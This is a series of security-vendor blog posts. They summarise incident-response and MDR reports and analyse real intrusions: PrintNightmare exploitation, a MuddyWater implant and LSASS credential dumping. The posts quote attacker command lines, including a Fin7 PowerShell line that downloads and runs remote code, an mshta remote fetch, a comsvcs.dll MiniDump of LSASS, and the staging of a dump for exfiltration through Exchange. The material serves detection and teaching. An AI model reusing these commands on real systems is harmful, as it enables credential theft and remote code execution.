Internal threats – Securelist

The nature of cyberincidents in 2022

Kaspersky GERT, Kaspersky Security Services — Tue, 16 May 2023 08:00:57 +0000

Kaspersky offers various services to organizations that have been targeted by cyberattackers, such as incident response, digital forensics, and malware analysis. In our annual incident response report, we share information about the attacks that we investigated during the reporting period. Data provided in this report comes from our daily interactions with organizations seeking assistance with full-blown incident response or complementary expert services for their internal incident response teams.

Download the full version of the report (PDF)

Kaspersky Incident Response in various regions and industries

In 2022, 45.9% of organizations that encountered cyberincidents were in Russia and the CIS region, followed by the Middle East (22.5%), the Americas (14.3%), and Europe (13.3%).

From an industry perspective, we offered help to government (19.39%), financial (18.37%), and industrial (17.35%) organizations most frequently.

Key trends in 2022: initial attack vectors and impact

In 2022, attackers most often penetrated organizations’ infrastructure by exploiting various vulnerabilities in public-facing applications (42.9%). However, compared to 2021, the share of this initial attack vector decreased by 10.7 pp, while the share of attacks involving compromised accounts (23.8%) grew. Malicious e-mail sharing among the initial attack vectors continued to go down and comprised 11.9% in 2022.

In 39.8% cases the reported incidents were related to ransomware attacks. Encrypted data remains the number-one problem that our customers are faced with. However, compared to 2021, the number of ransomware-related incidents dropped, and not every attack involving file encryption was aimed at extracting a ransom. In some of these incidents, ransomware was used to hide the initial traces of the attack and complicate the investigation.

Expert recommendations

To protect your organization against cyberattacks, Kaspersky experts recommend the following:

Implement a robust password policy and enforce multifactor authentication
Remove management ports from public access
Establish a zero-tolerance policy for patch management or compensation measures for public-facing applications
Make sure that your employees maintain a high level of security awareness
Use a security toolstack with EDR-like telemetry
Implement rules for detection of pervasive tools used by adversaries
Continuously train your incident response and security operations teams to maintain their expertise and stay up to speed with the changing threat landscape
Back up your data on a regular basis
Work with an Incident Response Retainer partner to address incidents with fast SLAs

To learn more about incident response in 2022, including a MITRE ATT&CK tactics and techniques heatmap, and distribution of various incidents by region and industry, download the full version of the report (PDF).

For a deeper analysis of the vulnerabilities most commonly exploited by cyberattackers, download this appendix (PDF).

Managed Detection and Response in 2022

Kaspersky Security Services — Tue, 02 May 2023 08:00:15 +0000

Kaspersky Managed Detection and Response (MDR) is a service for 24/7 monitoring and response to detected incidents based on technologies and expertise of Kaspersky Security Operations Center (SOC) team. MDR allows detecting threats at any stage of the attack – both before anything is compromised and after the attackers have penetrated the company’s infrastructure. This is achieved through preventive security systems and active threat hunting – the essential MDR components. MDR also features automatic and manual incident response and expert recommendations.

The annual Kaspersky Managed Detection and Response analytical report sums up the analysis of incidents detected by Kaspersky SOC team. The report presents information on the most common offensive tactics and techniques, the nature and causes of incidents and gives a breakdown by country and industry.

2022 incidents statistics

Security events

In 2022, Kaspersky MDR processed over 433,000 security events. 33% of those (over 141,000 events) were processed using machine learning technologies, and 67% (over 292,000) were analyzed manually by SOC analysts.

Over 33,000 security events were linked to 12,000 real incidents. Overall, 8.13% of detected incidents were of high, 71.82% of medium, and 20.05% of low severity.

Response efficiency

72% of 2022 incidents were detected based on a single security event, after which the attack was stopped right away. Of these, 4% were of high, 74% of medium, and 22% of low severity.

On average, in 2022, a high severity incident took the SOC team 43.8 minutes to detect. The 2022 figures for medium and low severity incidents are 30.9 and 34.2, respectively.

Geographical distribution, breakdown by industry

In 2022, 44% of incidents were detected in European organizations. Russia and CIS are in second place with a quarter of all detected incidents. Another 15% of incidents relate to organizations from the Asia-Pacific.

Industry-wise, industrial organizations suffered more incidents than any. Most of the critical incidents were detected in government agencies, industrial and financial organizations. It is worth noting though that a fair share of critical incidents across financial organizations was due to Red Teaming events.

Recommendations

For effective protection from cyberattacks, these are Kaspersky SOC team’s recommendations to organizations:

Apart from the classic monitoring instruments, deploy the active threat hunting methods and tools allowing for early detection of incidents.
Hold regular cyberdrills involving Red Teaming to train your teams to detect attacks and analyze the organization’s security.
Practice the multilevel malware protection approach comprising various threat detection technologies – from signature analysis to machine learning.
Use MITRE ATT&CK knowledge bases.

See the full version of the report (PDF) for more information on the incidents detected in 2022, main offensive tactics and techniques, MITRE ATT&CK classification of incidents, and detection methods. To download it, please, fill in the form below.

How much does access to corporate infrastructure cost?

Sergey Shcherbel, Yuliya Novikova — Wed, 15 Jun 2022 10:00:29 +0000

Division of labor

Money has been and remains the main motivator for cybercriminals. The most widespread techniques of monetizing cyberattacks include selling stolen databases, extortion (using ransomware) and carding. However, there is demand on the dark web not only for data obtained through an attack, but also for the data and services necessary to organize one (e.g., to perform specific steps of a multiphase attack). Complex attacks almost invariably feature several phases, such as reconnaissance, initial access to the infrastructure, gaining access to target systems and/or privileges, and the actual malicious acts (data theft, destruction or encryption, etc.). This is just one example of a phased attack where each step can be accomplished by a new contractor – if only because the different steps require different expertise.

Experienced cybercriminals seek to ensure the continuity of their business and constantly need new data for initial access to corporate systems. It’s advantageous for them to pay for prearranged access rather than spend time digging for primary vulnerabilities and penetrating the perimeter.

Screenshot translation

Managed detection and response in 2021

Kaspersky Security Services — Thu, 26 May 2022 11:00:55 +0000

Kaspersky Managed Detection and Response (MDR) helps organizations to complement existing detection capabilities or to expand limited in-house resources to protect their infrastructure from the growing number and complexity of threats in real time. We collect telemetry from clients’ networks and analyze it using machine learning and artificial intelligence, plus human threat-hunting analysts. Kaspersky SOC investigates alerts and notifies the client if there is something bad going on, providing response actions and recommendations.

MDR in 2021 in numbers

In 2021:

Kaspersky MDR received 414K alerts.
63.74% of received alerts were processed by SOC analysts, 6.67% of which were related to real incidents reported to customers via the MDR portal
77.4% of all incidents are related to only one alert
14% of incidents were high-severity, 66% medium-severity, and 20% low-severity
The average identification time of high-severity incidents was 41.4 minutes
40.7% of high-severity incidents were targeted attacks; 18% were ethical offensive exercises (penetration testing, red teaming etc.)
Most incidents were detected at the initial access (27.3%) and lateral movement (16.3%) stages
Most often high-severity incidents were detected in IT (39%), industrial (30.2%), and financial (29.1%) organizations
The LOL binaries most often used by attackers were cmd.exe, powershell.exe, and rundll.exe

Download the full Kaspersky Managed Detection and Response 2021 report.

Kaspersky Managed Detection and Response: interesting cases

Petr Mareichev, Sergey Soldatov — Wed, 15 Dec 2021 10:00:42 +0000

Kaspersky Managed Detection and Response (MDR) provides advanced protection against the growing number of threats that bypass automatic security barriers. Its capabilities are backed by a high-professional team of security analysts operating all over the world. Each suspicious security event is validated by our analysts complementing the automatic detection logic and letting us continuously improve the detection rules.

The MDR results allow us to map out the modern threat landscape and show techniques used by attackers right now. We share these results with you so that you are more informed about in-the-wild attacks and better prepared to respond.

PrintNightmare vulnerability exploitation

This summer, we witnessed a series of attacks using a dangerous vulnerability in the Windows Print Spooler service: CVE-2021-1675/CVE-2021-34527, also known as PrintNightmare. This vulnerability was published in June 2021 and allows attackers to add arbitrary printer drivers in the spooler service and thus remotely execute code on a vulnerable host under System privileges. We have already published the technical details of this vulnerability, and today we will talk about how MDR analysts detected and investigated attacks that exploit this vulnerability in real companies.

Case #1

Shortly after the PrintNightmare vulnerability was published, a detailed report with a technical description of the problem, as well as a working PoC exploit, was posted on GitHub by mistake. The repository was disconnected several hours later, but during this time several other users managed to clone it.

Kaspersky detected an attempt to exploit the PrintNightmare vulnerability using this publicly available tool. The MDR team observed a request to suspicious DLL libraries from the spooler service. It should be noted, that the file names used by the attacker were exactly the same as those available in the public exploit on GitHub.

	Kaspersky detected suspicious DLL libraries (nightmare.dll) on the monitored host.	C:\Windows\System32\spool\drivers\x64\3\nightmare.dll C:\Windows\System32\spool\drivers\x64\3\old\1\nightmare.dll
	In addition, the following script was found on the host.	\cve-2021-1675-main-powershell\cve-2021-1675-main\cve-2021-1675.ps1

The table below contains signs of suspicious activity that served as a starting point for the investigation.

MITRE ATT&CK Technique	MDR telemetry event type used	Detection details	Description
T1210: Exploitation of Remote Services	Local File Modification	Modified file path: C:\Windows\System32\spool\drivers\x64\3\old\ 1\nightmare.dll File modifier: C:\Windows\System32\spoolsv.exe Parent of the modifier: C:\Windows\System32\services.exe	Legitimate spoolsv.exe locally modified c:\windows\system32 \spool\drivers\x64\ 3\old\1\nightmare.dll
T1588.005: Obtain Capabilities: Exploits	AV exact detect in OnAccess mode	File: \cve-2021-1675-main-powershell\cve-2021- 1675-main\cve-2021-1675.ps1 AV verdicts: Exploit.Win64.CVE-2021-1675.c; UDS:Exploit.Win64.CVE-2021-1675.c	CVE-2021-1675 exploit was detected and successfully deleted by AM engine

Case #2

In another case, MDR analysts discovered a different attack scenario related to the exploitation of the PrintNightmare vulnerability. In particular, spooler service access to suspicious DLL files was observed. In addition, the spooler service executed some unusual commands and established a network connection. Based on the tools used by attackers, we presume that this activity was related to penetration testing.

	MDR analyst detected the creation of suspicious DLL libraries using the certutil.exe tool on a monitored host. After that, the spooler service was added to the planned tasks.	C:\Windows\System32\spool\driver s\x64\3\new\hello.dll C:\Windows\System32\spool\driver s\x64\3\new\unidrv.dll…
	Next, the spooler service called the newly created DLL files. In addition, the attacker ran some of the created libraries using the rundll32 component.
	Several hours later, a new wave of activity began. The Kaspersky MDR team detected a registry key modification that forces NTLMv1 authentication. It potentially allows NTLM hashes to be intercepted.	\REGISTRY\MACHINE\SYSTEM\Control Set001\Control\Lsa\MSV1_0
	Then the attacker re-added spooler to the planned tasks. After that, execution of various commands on the host with System privileges was observed. The source of this activity was c:\windows\system32\spoolsv.exe process	C:\Windows\System32\cmd.exe /c net start spooler C:\Windows\System32\cmd.exe /c timeout 600 > NUL && net start spooler

The table below contains signs of suspicious activity that were the starting point for investigation.

MITRE ATT&CK Technique	MDR telemetry event type used	Detection details	Description
T1570: Lateral Tool Transfer	Web AV exact detect in OnDownload mode	AV verdict: HEUR:Trojan.Win32.Shelma.gen	Attacker downloads suspicious DLL (that is, Meterpreter payload) via HTTP
T1140: Deobfuscate/Decode Files or Information	Local File Modification	Process command lines: certutil -decode 1.txt C:\Share\hello4.dll	Attacker used certutil to decode text file into PE binary
T1003.001: OS Credential Dumping: LSASS Memory	AV exact detect in OnAccess mode	AV verdicts: VHO:Trojan‑PSW.Win64.Mimikatz.gen Trojan-PSW.Win32.Mimikatz.gen	Attacker tried to use Mimikatz
T1127.001: Trusted Developer Utilities Proxy Execution: MSBuild	Outbound network connection	Process command line: C:\Windows\Microsoft.NET\Framework\v4 .0.30319\MSBuild.exe C:\Share\1.xml	MSBuild network activity
T1210: Exploitation of Remote Services	Local File Modification	Modified file path: C:\Windows\System32\spool\drivers\x64 \3\old\1\hello5.dllFile modifier: C:\Windows\System32\spoolsv.exe Parent of the modifier: C:\Windows\System32\services.exe	Legitimate spoolsv.exe locally modified c:\windows\system3 2\spool\drivers\x6 4\3\old\1\hello5.dll
T1547.012: Boot or Logon Autostart Execution: Print Processors T1033: System Owner/User Discovery	Process start	Command line: whoami Process integrity level: System Parent process: C:\WINDOWS\System32\spoolsv.exe Grandparent process: C:\Windows\System32\services.exe	Legitimate spoolsv.exe started whoami with System integrity level
T1547.012: Boot or Logon Autostart Execution: Print Processors	Outbound network connection	Process command line: C:\Windows\System32\spoolsv.exe Remote TCP port: 4444/TCP	Legitimate spoolsv.exe made a connection to default Meterpreter port (4444/TCP)
T1547.012: Boot or Logon Autostart Execution: Print Processors T1059.003: Command and Scripting Interpreter: Windows Command Shell T1033: System Owner/User Discovery	Process start	Command line: whoami Process integrity level: System Parent process: C:\Windows\System32\cmd.exe Grandparent process: C:\Windows\System32\spoolsv.exe	Legitimate spoolsv.exe started cmd.exe that started whoami with System integrity level

MuddyWater attack

In this case, the Kaspersky MDR team detected a request from the customer’s infrastructure to a malicious APT related host. Further investigation allowed us to attribute this attack to the MuddyWater group. MuddyWater is a threat actor that first surfaced in 2017. This APT group mainly targets government agencies in Iraq, Saudi Arabia, Jordan, Turkey, Azerbaijan, and Pakistan. Kaspersky’s report on this group’s activity is available here.

Among other methods, the group uses VBS implants in phishing emails as an initial attack vector. During execution, the implant accesses URLs with a common structure to connect to the C2 server. The typical structure of the URL is provided below.

	First of all, MDR analysts found a VBS implant from startup, presumably related to the MuddyWater group, to be running on the monitored host.	\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs
	After script execution, some malicious resources were accessed. The structure of these URLs follows the common structure used by the MuddyWater group. In addition, the accessed IP address was observed in other attacks of this group.	hxxp://185[.]117[.]73[.]52:443/getTarget Info?guid=xxx-yyy-zzz&status=1 hxxp://185[.]117[.]73[.]52:443/getComman d?guid=xxx-yyy-zzz*
	Next, execution of commands to collect information from the compromised host was observed.	“C:\Windows\System32\cmd.exe” /c explorer.exe >> c:\ProgramData\app_setting_readme.txt “C:\Windows\System32\cmd.exe” /c whoami >> c:\ProgramData\app_setting_readme.txt

* xxx is company short name (identifier), yyy is the victim hostname and zzz is username

Table below contains signs of suspicious activity that were the starting point for investigation.

MITRE ATT&CK Technique	MDR telemetry event type used	Detection details	Description
T1071: Application Layer Protocol	Access to malicious hosts from nonbrowsers	Target URL: hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid =xxx-yyy-zzz&status=1 CMD line: “C:\Windows\System32\WScript.exe” C:\Users\USERNAME\AppData\Roaming\Microsoft\Windo ws\Start Menu\Programs\Startup\KLWB6.vbs Process: C:\Windows\system32\wscript.exe	VBS script accessed malicious URL during execution
T1071: Application Layer Protocol	URL exact detect	Malicious URL: hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid =xxx-yyy-zzz&status=1 AV verdict: Malware	Malicious URL was successfully detected by AV

Credential Dumping from LSASS Memory

In the last case, we’d like to talk about an attack related to collecting credentials from the LSASS process memory dump (T1003.001 MITRE technique). Local Security Authority Subsystem Service (LSASS) stores a variety of credentials in process memory. These credentials can be harvested by System or administrative user and then used for attack development or lateral movement.

MDR analysts detected an attempt to dump the LSASS process memory on the monitored host, despite the fact that most of the attacker’s actions did not differ from the usual actions of the administrator. The attackers used two public tools (the first one was detected and blocked by an AV solution) to dump the LSASS process memory and export the obtained dump via Exchange server. In particular, the MDR team observed the download and execution of a suspicious DLL file (categorized as SSP) by LSASS.exe.

	The attacker executed several recon commands to get more information about the host, and then ran commands to get the LSASS process ID.	C:\Windows\System32\tasklist.exe C:\Windows\System32\findstr.exe /i sass
	After that, the attacker tried to run a malicious tool to dump the process memory, but it was blocked by an endpoint protection solution.	“C:\Windows\System32\rundll32.exe” C:\Windows\System32\comsvcs.dll MiniDump 616 c:\programdata\cdera.bin full ## 616 is LSASS process id
	Then the attacker tried to dump the LSASS process memory using another tool. They unzipped an archive containing the resource.exe and twindump.dll files.	C:\Windows\System32\cmd.exe /C c:\”program files”\7- zip\7z.exe x -pKJERKL6j4dk&@1 c:\programdata\m.zip -o c:\windows\cluster ## resource.exe and twindump.dll files were created
	Subsequently, the file resource.exe was added to the planned tasks and executed. However, the attempt to obtain an LSASS dump was unsuccessful.	C:\Windows\System32\cmd.exe /C C:\Windows\System32\staskes.exe /create /tn Ecoh /tr “cmd /c C:\Windows\cluster\resource.exe ase2af6das3fzc2 agasg2aa23gfdgd” /sc onstart /ru system /F ## staskes.exe is a renamed schtasks.exe file
	Later, one more attempt to perform this technique was made. The attacker unpacked an archive containing another malicious utility, and ran it the same way as previously. The created files are presumably related to the MirrorDump tool. As a result, the attacker successfully obtained an LSASS dump.	C:\Windows\System32\cmd.exe /C c:\”program files”\7- zip\7z.exe x -p”KJERfK#L6j4dk321″ c:\programdata\E.zip -o c:\programdata\ C:\Windows\System32\cmd.exe /C c:\windows\system32\staskes.exe /create /tn Ecoh /tr “c:\programdata\InEnglish.exe g2@j5js1 0sdfs,48 C:\programdata\EnglishEDouble C:\programdata\EnglishDDouble C:\programdata\English1.dll C:\programdata\English.dmp” /sc onstart /ru system /F C:\Windows\System32\cmd.exe /C c:\windows\system32\staskes.exe /run /tn Ecoh
	Then the obtained dump was exported to Exchange server. Afterwards, the attacker deleted all the created files.	C:\Windows\System32\cmd.exe /C copy c:\programdata\Es.zip c:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\owa\auth\Es.png

Table below contains signs of suspicious activity that were the starting point for investigation.

MITRE ATT&CK Technique	MDR telemetry event type used	Detection details	Description
T1003.001: OS Credential Dumping: LSASS Memory	AV exact detect	AV verdict: PDM:Exploit.Win32.GenericProcess command line: “C:\Windows\System32\rundll32.exe” C:\Windows\System32\comsvcs.dll MiniDump 616 C:\programdata\cdera.bin full Parent process command line: C:\Windows\System32\wsmprovhost.exe – Embedding Grandparent process command line:: C:\Windows\System32\svchost.exe -k DcomLaunchProcess logon type: 3 (Network logon)	Remotely executed process memory dump was detected by AM engine 616 is LSASS process PID
T1003.001: OS Credential Dumping: LSASS Memory	Create section (load DLL) Execute section (run DLL)	DLL name: C:\programdata\english1.dll Process: C:\Windows\System32\lsass.exe Process PID: 616 Parent process: command line: C:\Windows\System32\wininit.exe Process integrity level: System	Unknown DLL was loaded and executed within lsass.exe
T1003.001: OS Credential Dumping: LSASS Memory	Inexact AV detect	Internal AV verdict: The file is Security Support Provider (SSP) File path: C:\programdata\english1.dll Process: C:\Windows\System32\lsass.exe	Unknown DLL loaded to lsass is SSP
T1053.005: Scheduled Task/Job: Scheduled Task	Create process	Process command line: C:\programdata\InEnglish.exe g2@j5js1 0sdfs,48 C:\programdata\EnglishEDouble C:\programdata\EnglishDDouble C:\programdata\English1.dll C:\programdata\English.dmp Parent process command line: taskeng.exe {7725474B-D9EA-473D-B10D- AC0572A0AA70} S-1-5-18:NT AUTHORITY\System:Service: Grandparent process command line: C:\Windows\System32\svchost.exe -k netsvcs Process integrity level: System Process user SID: S-1-5-18	Suspicious executable from C:\programdata run as scheduled task under System privileges

Observed malicious files:

c:\programdata\e.zip	0x37630451944A1DD027F5A9B643790B10
c:\programdata\es.zip	0x3319BD8B628F8051506EE8FD4999C4C3
c:\programdata\m.zip	0xC15D90F8374393DA2533BAF7359E31F9
c:\programdata\inenglish.exe	0xCB15B1F707315FB61E667E0218F7784D
c:\programdata\english1.dll	0x358C5061B8DF0E0699E936A0F48EAFE1
c:\windows\cluster\resource.exe	0x872A776C523FC33888C410081A650070
c:\windows\cluster\twindump.dll	0xF980FD026610E4D0B31BAA5902785EDE

Conclusion

Attackers follow trends. They use any loophole to break into your corporate network. Sometimes they learn about new vulnerabilities in products earlier than security researchers do. Sometimes they hide so skillfully that their actions are indistinguishable from those of your employees or administrators.

Countering targeted attacks requires extensive experience as well as constant learning. Kaspersky Managed Detection and Response delivers fully managed, individually tailored ongoing detection, prioritization, investigation, and response. As a result, it provides all the major benefits from having your own security operations center without having to actually set one up.

Incident response analyst report 2020

Kaspersky Security Services, Kaspersky GERT — Mon, 13 Sep 2021 11:00:04 +0000

Download full report (PDF)

The Incident response analyst report provides insights into incident investigation services conducted by Kaspersky in 2020. We deliver a range of services to help organizations when they are in need: incident response, digital forensics and malware analysis. Data in the report comes from our daily practices with organizations seeking assistance with full-blown incident response or complementary expert activities for their internal incident response teams.

In 2020, the pandemic forced companies to restructure their information security practices, accommodating a work-from-home (WFH) approach. Although key trends in terms of threats have stayed the same, our service approach moved to a near-complete – 97% of all cases – remote delivery.

Geography of incident responses by region, 2020

Most of the incident handling requests were received from the CIS (27.8%), European Union (24.7%) and the Middle East (22.7%) regions. In 2020, organizations seeking our assistance represented a wide spectrum of business sectors, industry, finance, government, telecoms, transportation and healthcare.

Share of incident responses by vertical and industry, 2020

Industrial businesses were the most affected by cyberattacks (22%), followed by government institutions (19%). Most of our responses were ransomware-related: in 32.7% of true positive cases, the incidents were caused by encrypted files.

Overall, the Incident response analyst report 2020 contains four chapters:

Reasons to go for incident response
Most of the incidents with causes before the impact can be confidently classified as ransomware. This threat is overtaking money theft and other impacts as a more convenient monetization scheme with much broader industry coverage (not just finance).
Initial vectors, or how attackers got in
Security issues with passwords, software vulnerabilities and social engineering combined into an overwhelming majority of initial access vectors during attacks.
Tools and exploits
Almost half of all incident cases included the use of existing OS tools (like LOLbins), well-known offensive tools from GitHub (e.g. Mimikatz, AdFind, Masscan) and specialized commercial frameworks (Cobalt Strike).
Attack duration
We grouped all incident cases into three categories with different attacker dwell times, incident response duration, initial access, and impact from the attack.

To learn more on these topics, please read the full report (English, PDF).

Managed Detection and Response in Q4 2020

Kaspersky Security Services — Wed, 21 Jul 2021 10:00:04 +0000

Download full report (PDF)

As cyberattacks become more sophisticated, and security solutions require more resources to analyze the huge amount of data gathered every day, many organizations feel the need for advanced security services that can deal with this growing complexity in real time, 24/7.

This article contains some analytical findings from Managed Detection and Response (MDR) operations during Q4 2020.

What is Kaspersky MDR

Kaspersky MDR uses Kaspersky Endpoint Security and Kaspersky Anti Targeted Attack Platform as low-level telemetry suppliers after MDR license activation. Raw telemetry is initially enriched and correlated in the cloud, then two levels of SOC analysis process the resulting alerts. The first level of SOC analysis is a neural network-based supervised ML model that is trained on alerts investigated by human analysts. The second level consists of on-duty SOC analysts, who triage alerts and provide recommendations on response to customers.

The MDR team also has a dedicated group for threat-hunting activities — proactive searching for threats through raw telemetry to find attacks that were not detected by automated logic, including ML/AI in the MDR cloud infrastructure. The threat-hunting team is responsible for detection engineering, so all threats found manually are then covered with automatic detection and prevention logic to speed up customer protection.
During the reporting period, Kaspersky MDR was used across all industry verticals as shown below along with the share of detected incidents for each.

Data processing pipeline and security operations

In Q4 2020, the average number of collected raw events from one host was around 15 000. This comparatively low amount is explained by comprehensive analysis performed by Kaspersky Endpoint Security right at the endpoint, such as objects reputation checks, and the fact that only a required minimum of telemetry is sent to the cloud for further analysis.

During the reported period, MDR processed approximately 65 000 alerts, followed by an investigation that resulted in 1 506 incidents reported to customers, approximately 93% of which were mapped to the MITRE ATT&CK framework.

From a security operations standpoint, incident processing depends on alert severity. High severity typically requires more time to investigate and provide recommendations on remediation steps.

Incident remediation efficiency

Most of the incidents (80.1%) were detected based on the first analyzed alert. This means that after the first true positive alert, remediation activities stopped the attack from happening and no new alerts were linked to the incident. This demonstrates that remediation is fairly efficient.

Incidents linked to 2-4 alerts account for 15.3%; they represent the main directions for detection engineering, both in new alert development and improvements to existing alerts.

Incidents linked with larger numbers of alerts are related to cases where fast remediation is not efficient or not allowed. Examples of these incidents include a new targeted attack that requires thorough investigation before active response, or security assessment engagements, where active counteraction to attacker is not allowed.

Incident severity

According to the MDR incident severity classification, High-severity incidents are related to human-driven attacks or malware outbreaks with a high impact. Medium severity is related to incidents that significantly affect the efficiency or performance of assets covered by MDR. Finally, Low severity is related to incidents without a significant impact, which still ought to be fixed, for example, infection with grayware, such as adware, riskware, etc.

High-severity incidents can be caused by a number of factors:

APT, targeted attack
Offensive exercise
Artefacts of APT, targeted attack
Malware with critical impact
Likely-to-be-exploited vulnerability
DDOS/DOS with impact
Insider threat with impact (subversion, fraud)
Social engineering

In the analyzed period, the incident severity statistics and distribution of High-severity incidents were as follows.

Distribution of incidents by criticality		Types of High-severity incidents

Almost all of the verticals in the analyzed period were victims of targeted attacks. IT, Government and Industrial are the TOP 3. Companies that suffered from targeted attacks typically engaged in offensive exercises, a sign of adequate risk assessment.

Adversary tactics, techniques and procedures

As for the attack kill-chain stage, we do not see any correlation between incident severity and tactics at the moment of detection, although it might be expected that more complex attacks would be detected at a later stage.

Analysis of the detection technology has confirmed that there is a need for a combination of different detection systems, because the endpoint tactics are efficiently detected by EPP; SB provides better results at analyzing content before it reaches the endpoint, and all network communications are subject to IDS.

Next, there are the top performing (by the number of reported incidents) MITRE ATT&CK techniques, detected by telemetry from each sensor.

Analysis of tools that attackers use in the incidents shows that PowerShell is still number one and especially popular in High-severity incidents.

Recommendations

Analysis of incident statistics suggests the following recommendations on improving the security controls in place.

One third of all high-severity incidents were human-driven targeted attacks. Automated tools are not enough for fully detecting these, so manual threat hunting in combination with classical alert-driven monitoring should be implemented.
Professional red team exercises are very similar to advanced attacks and are thus a good approach to assessing the organization’s operational efficiency.
Nine percent of reported High-severity incidents were successful social engineering attacks, which demonstrates the need for raising employee security awareness.
Be ready to detect threats that use every tactic (attack kill chain phase).
Even a complex attack consists of simple steps and techniques; the detection of a particular technique can expose the whole attack.
Different detection technologies have different levels of efficiency with different attacker techniques. Maintain a variety of security technologies to increase the chances of successful detection.
Monitor PowerShell with built-in Windows events or comprehensive EDRs.

Adaptive protection against invisible threats

Oleg Zaitsev, Rodion Gadyrshin, Evgeny Lopatin — Mon, 14 Dec 2020 12:00:59 +0000

Corporate endpoint security technologies for mid-sized companies struggle to surprise us with anything brand new. They provide reliable protection against malware and, when combined with relevant policies, regular updates, and employee cyberhygiene, they can shield a business from a majority of cyber-risks. For some, it may seem like you do not need more security than this… But is that really the case?

The answer, in short, is no. In fact, in most medium-sized companies’ cybersecurity strategies, even with an endpoint solution, there are likely to still be gaps that can and should be closed. In this article, we look at what those gaps are and how to fill them.

Legitimate software can hide risks

Detecting an exploit or trojan that explicitly runs on a device is not a problem for an antivirus solution. But when a malicious script is launched through a legitimate application, this can be a challenge. For example, when a phishing email document is opened in Microsoft Office, all actions will be performed by the office application.

Such authorized software is often used on a large number of devices, and it is not feasible to simply ban access to it. Antivirus solutions will also recognize these files as “trusted”, so may be unable to quickly “understand” that the piece of office software is executing atypical processes initiated by malicious code. Moreover, such activity can sometimes be started by administrators themselves as part of system maintenance. For example, the “trusted” Windows Management Engine on a remote machine can be used for deployment purposes. This further complicates the threat detection process.

What it can lead to: fileless malware, insider threats, miners and ransomware

Downloaders are one type of malware that uses this legitimate software cover. It does not itself perform any direct malicious actions on the device. Instead, it gets to the machine, for example, through a phishing email, and then independently downloads the real malicious code onto it.

There is a specific type of malware – fileless malware – that is often used as a downloader. It does not store itself on the hard disk, therefore tracking it with an ordinary antivirus solution is not easy. Because of that, fileless malware is often used in advanced targeted attacks, such as Platinum APT, whose victims were state and diplomatic organizations. Another example is the advanced PowerGhost cryptominer, which used trusted software for cryptocurrency mining. According to Kaspersky statistics, of all the anomalous activity detected in legitimate Windows Management Instrumentation processes (WMI), two-thirds (67%) were fileless downloaders of the Emotet banking trojan and the WannMine cryptominer. WMI on remote machines is often used by malware for lateral movement.

Malware families running in WMI (download)

Now, some might think that simply tightening policies and scaling down user privileges is the way to stop the malware from starting any process on the device. However, this is not an option, because fileless malware does not need administrator privileges to perform its malicious actions.

Another possible risk of authorized software exploitation occurs when malicious activity is initiated by someone on the network. If the company is lucky, it is just an employee who decided to mine coins using the corporate computing power. But in this case, since the actions are performed by a trusted user, administrators or a security solution may not be able to detect them.

Finally, some forms of malware can use legitimate processes to disguise themselves (svchost.exe, for example), which makes them more difficult to detect manually by IT security teams.

What can help? You need Little Red Riding Hood 2.0, who detects the wolf through external signs and calls lumberjacks before being eaten

To eliminate these threats, IT security teams need technology that allows them to detect any suspicious application activity from a corporate cybersecurity perspective. Spotting anomalies in trusted software helps to identify threats at the very early stages, when the malware is already on the device but before the antivirus reacts to it. This technology, developed by Kaspersky, is called Adaptive Anomaly Control.

To make anomaly detection work, several problems need to be solved. First, how does Adaptive Anomaly Control know which activity is abnormal and which is not? Secondly, if the control notifies an administrator about each deviation, many of the notifications will most likely turn out to be just false positives for scripts launched as part of a workflow. In that situation, the user will immediately want to disable the control.

To resolve that, the technology should first be “trained” to recognize how applications work and what actions are performed regularly by employees as part of their job responsibilities. This minimizes the number of false positives and keeps administrators from going crazy. And, most importantly, if Adaptive Anomaly Control notifies the IT security manager about suspicious activity to ensure they understand when action needs to be taken immediately. Thus, the technology will turn from “the boy who kept crying wolf” into an advanced version of Little Red Riding Hood, who manages to recognize the wolf in the guise of her grandmother early on and call the lumberjacks for help before she gets eaten.

How Adaptive Anomaly Control works

Adaptive Anomaly Control works on the basis of rules, statistics and exceptions. Rules cover three groups of programs: office programs, Windows Management Instrumentation, and script engines and frameworks, as well as the abnormal program activity category. The rules are already developed in the product, so there is no need to write them manually.

List of rules for office applications

To start with, Adaptive Anomaly Control has training mode activated for about two weeks. During this time, it monitors the network and collects statistics on application usage. Technically, Adaptive Anomaly Control mostly analyzes process creation actions. For example, the command line code of a new process, file path and name of executable, and also the calling stack can be analyzed to determine an anomaly. The technology marks regular anomalies, which indicate that processes are started by employees for work purposes. Based on the data received, it then sets exceptions to the rules. If administrators use scripts that could potentially trigger the rules, they can create exceptions before turning on the component, which will improve the quality of the training process.

The training period avoids false positives, but it also helps to catch important anomalies. If a false positive occurs within a rule, administrators can choose not to block the entire network with the exception, but instead configure it for just the particular script that triggered the rule. This mitigates the risk of throwing a global exception that makes the component useless.

The policies can be tuned for different groups of users individually and inherited as part of user profiles. For example, financial department employees would never legitimately need to execute JavaScript, but the development team will. Therefore, for the software development department, some rules may be disabled or provided with numerous exceptions, while for the financial department, they may be turned on. Adaptive Anomaly Control identifies the user group in which the rule is triggered to block or allow execution accordingly.

Adding an exclusion for a user or group

After the training period, when Adaptive Anomaly Control enters combat mode, the component notifies the IT security manager about any anomalies outside of the exceptions specified during the training period. It provides information for investigation, such as what processes triggered the operations, on what computers and under what users.

Example of anomalous activity by Microsoft Word and possible actions

For example, a PowerShell script trying to start a Windows Command Processor, HTML Application Host, or Register Server from office software may be considered suspicious. Launching these activities is technically possible but not typical of regular operation. Let us focus on some real-life examples which Adaptive Anomality Control component detects. Fin7 spear phishing campaigns have included malicious Word documents with DDE execution of PowerShell code, which were detected and blocked (doc MD5: 2C0CFDC5B5653CB3E8B0F8EEEF55FC32).

Fin7 document with DDE execution

Command-line code from inside a document:

powershell  -C ;echo "https://sec[.]gov/";IEX((new-object net.webclient).downloadstring('https[:]//trt.doe.louisiana[.]gov/fonts.txt'))

Another example is the LockiBot’s downloader, which was also started from within office software (doc MD5: 2151D178B6C849E4DDB08E5016A38A9A):

mshta http[:]//%20%20@j[.]mp/asdaaskdasdjijasdiodkaos

